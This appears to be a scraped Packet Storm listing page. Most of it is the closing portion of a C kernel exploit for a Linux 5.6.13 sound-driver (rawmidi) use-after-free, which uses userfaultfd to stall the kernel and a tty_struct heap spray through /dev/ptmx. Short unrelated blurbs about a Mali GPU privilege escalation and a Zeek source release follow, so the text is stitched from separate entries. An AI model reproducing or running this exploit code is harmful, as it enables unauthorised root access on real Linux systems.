    if ((page = mmap((void *)0x5550000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    addr = page;  
    memset(addr, 'C', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT3);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[4], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 800 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 800;  
    srp.avail_min = 1;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by kmalloc-1024");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd3;

    /* Blocking before object created by size 1024 in userfault */  
    pthread_create(&thread[5], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 1024 generating an UAF */  
    srp.buffer_size = 90;  
    err = ioctl(fd3, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 1024 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    int spray[256];

    /* tty_struct spray */  
    for(int i = 0; i < 256; i++)  
    {  
        spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);

        if(spray[i] < 0)  
        {  
            printf("[-] Failed open /dev/ptmx\n");  
        }  
    }

    puts("[+] Allocate tty_struct in kmalloc-1024");

    release_page_fault = true;

    while(release_page_fault == true);  
    puts("[+] Page fault lock released");

    for(int i = 0; i < 256; i++)  
    {  
        ioctl(spray[i], 0, next - 8);  
    }  
}

Linux Kernel 5.6.13 Use-After-Free

This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which the researcher independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models.

Mali GPU Kernel Local Privilege Escalation

Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. While focusing on network security monitoring, Zeek provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Zeek has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyber-infrastructure. Zeek's user community includes major universities, research labs, supercomputing centers, and open-science communities. This is the source code release.

Source

Packet Storm